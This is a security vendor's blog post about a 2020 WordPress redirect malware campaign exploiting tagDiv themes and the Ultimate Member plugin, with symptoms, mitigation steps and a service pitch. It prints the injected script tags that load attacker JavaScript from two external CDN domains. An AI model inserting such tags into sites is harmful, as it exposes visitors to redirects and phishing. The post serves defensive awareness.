911 Hack Removal

WordPress Redirect Campaign: Vulnerable tagDiv Themes and Ultimate Member Plugins

Updated on: March 29, 2020

WordPress Redirect Campaign: Vulnerable tagDiv Themes and Ultimate Member Plugins

With each passing day, cases of WordPress infection that redirects visitors to suspicious pages is getting common.  Recently, a vulnerability was discovered in tagDiv Themes and Ultimate Member Plugins. In this WordPress redirect hack visitors to your website are redirected to phishing or malicious pages.

In this hack, users, when redirected, are taken to irritating pages with arbitrary URL

hxxp utroro.com/xyz  or 

hxxp://murieh.abc/xyz or


and pishing reCAPTCHA images. The displayed text tries to trick visitors to allow browser notifications without disclosing the motive.

Fake CAPTCHA pishing page

Moreover, Google will penalize you by blacklisting your website against Pishing and hacked website. The web browsers will display a warning message to visitors visiting your website.

Injected Malicious Scripts

The infused infection involves a code from either of the two website sites:  cdn.allyouwant.online. and cdn.eeduelements.com.

The former was used in the recent stages of this malicious campaign and the latter was used in the beginning.

<script type='text/javascript' src='hxxps://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script><script type='text/javascript' src='hxxps://cdn.allyouwant.online/main.js?t=lp1'></script></head>

Currently 1700+ sites with the cdn.eeduelements.com script and 500+ sites with the cdn.allyouwant.online script.

Worried about WordPress redirect hack? Drop us a message on the chat widget and we’d be happy to help you fix it. Secure my WordPress website now.

Attack Vectors in  tagDiv Themes

The main people behind this WordPress exploit are tagDiv themes and the recently found (and already patched) vulnerability in a popular Ultimate Member plugin, which has 100,000+ active installations.

For outdated tagDiv themes, a malware injection appears like this:

WordPress Redirect: tagDiv themes infused malicious code

Vulnerability in the Ultimate Member Plugin

The Vulnerability in the Ultimate Member Plugin is  Unauthenticated Arbitrary File Upload. Although the vulnerability was fixed on August 9th, 2018.

Symptoms of WordPress Redirect Campaign: Ultimate Member Plugins Exploit

  1. Index.php corrupted
  2. Unknown PHP file in the /wp-content/plugins/ultimate-member/includes/images/smiles directory
  3. Error logs show: wp-content/plugins/ultimate-member/assets/dynamic_css/dynamic_profile.php on line 5 and line 6
  4. The website gets redirected to unwanted sites (Adware)
  5. Popups are shown on visiting the homepage
  6. Credit card information is stolen
  7. Unknown files are created on the server
  8. Query files in WordPress & plugin folders modified
  9. Gibberish Code in index.php

WordPress redirect hack: Mitigation

This WordPress redirect infection uses several other attack vectors and several variants of the suspicious code. Here, are some steps to mitigate WordPress redirect:

  1. Update all themes and plugins to the latest version.
  2. Setting up HTTP Authentication preventing PHP file from direct access in the upload folder. This is to prevent unauthorized execution.
  3. The malware can be found and removed in the theme’s admin interface in case of tagDiv infection.
  4. Delete all PHP files in subdirectories under wp-content/uploads/ultimatemember/temp/ in the case of the Ultimate Member Plugin exploit.

These malicious redirect campaigns frequently change infection code and affected files. It is best to consult a security expert.

Consult Astra security experts now for immediate malware clean up. Our powerful Firewall safeguards your website from XSS, LFI, RFI, SQL Injection, Bad bots, Automated Vulnerability Scanners and 80+ security threats. Secure my website now.

Tags: , , , , , , , ,

Naman Rastogi

Naman Rastogi is a Growth hacker and digital marketer at Astra security. Working actively in cybersecurity for more than a year, Naman shares the passion for spreading awareness about cybersecurity amongst netizens. He is a regular reader of anything cybersecurity which he channelizes through the Astra blog. Naman is also a jack of all trade. He is certified in market analytics, content strategy, financial markets and more while working parallelly towards his passion i.e cybersecurity. When not hustling to find newer ways to spread awareness about cybersecurity, he can be found enjoying a game of ping pong or CSGO.
Notify of

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Newest Most Voted
Inline Feedbacks
View all comments

[…] Related Article – Tagdiv theme exploited […]

Keto Lite Review
Keto Lite Review
4 years ago

Definitely, what a great blog and educative posts, I surely will bookmark your blog.All the Best!

Canopy CBD
Canopy CBD
4 years ago

It’s nearly impossible to find experienced people in this
particular topic, however, you seem like you know what you’re talking about!

Seratopical Review
Seratopical Review
4 years ago

Glad to be one of many visitants on this awesome web site :

Psst! Hi there. We’re Astra.

We make security simple and hassle-free for thousands
of websites and businesses worldwide.

Our suite of security products include a vulnerability scanner, firewall, malware scanner and pentests to protect your site from the evil forces on the internet, even when you sleep.

earth spiders cards bugs spiders

Made with ❤️ in USA France India Germany